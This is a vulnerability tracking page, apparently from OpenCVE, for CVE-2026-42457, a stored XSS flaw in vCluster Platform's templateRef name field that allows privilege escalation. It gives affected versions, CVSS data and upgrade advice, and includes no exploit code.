Description
vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0, there is a Stored XSS attack vulnerability via the name field of a templateRef. This can lead to the execution of arbitrary external scripts within the platform's browser context. In the worst case, a malicious user could potentially create a new Global-Admin user, bypassing other security restrictions. The attacker needs the ability to create namespaces. This vulnerability is fixed in 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0.
Published: 2026-05-14
Score: 9 Critical
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vCluster Platform contains a stored cross‑site scripting flaw in the templateRef name field that allows a malicious user who can create namespaces to inject and execute arbitrary JavaScript. The injected code runs in the browser context of other users and can be used to create a new Global‑Admin account, giving the attacker full administrative control over the platform and all virtual clusters. This results in a loss of confidentiality, integrity, and availability through privilege escalation.

Affected Systems

Affected products are Loft vCluster Platform releases prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0. All versions that do not include the patch are vulnerable; upgrading to any of the patched releases eliminates the flaw.

Risk and Exploitability

The CVSS score of 9 highlights a very high risk, and the lack of an EPSS score or KEV listing indicates the vulnerability has not yet been widely exploited publicly. However, the flaw requires only the ability to create namespaces, a capability that can be granted to trusted developers or collaborators. Once that condition is satisfied, the stored XSS can execute scripts with the associated user’s privileges, enabling attackers to forge privileged roles and compromise the entire cluster management environment.

Generated by OpenCVE AI on May 14, 2026 at 16:23 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Loft vCluster Platform to version 4.4.3 or any later release that contains the patch.
  • If an immediate upgrade is not possible, restrict or revoke the permission to create namespaces for untrusted or guest accounts to reduce the attack surface.
  • Sanitize or escape all input in the templateRef name field to block script injection as a temporary workaround.

Generated by OpenCVE AI on May 14, 2026 at 16:23 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 14 May 2026 16:45:00 +0000

Type Values Removed Values Added
First Time appeared Loft-sh
Loft-sh loft
Vendors & Products Loft-sh
Loft-sh loft

Thu, 14 May 2026 15:15:00 +0000

Type Values Removed Values Added
Description vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0, there is a Stored XSS attack vulnerability via the name field of a templateRef. This can lead to the execution of arbitrary external scripts within the platform's browser context. In the worst case, a malicious user could potentially create a new Global-Admin user, bypassing other security restrictions. The attacker needs the ability to create namespaces. This vulnerability is fixed in 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0.
Title vCluster Platform: Stored XSS can lead to privilege escalation
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}

Subscriptions

Loft-sh Loft
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-14T14:48:05.096Z

Reserved: 2026-04-27T13:55:58.693Z

Link: CVE-2026-42457

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Deferred

Published: 2026-05-14T15:16:46.500

Modified: 2026-05-14T17:19:49.973

Link: CVE-2026-42457

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-14T16:30:24Z

Weaknesses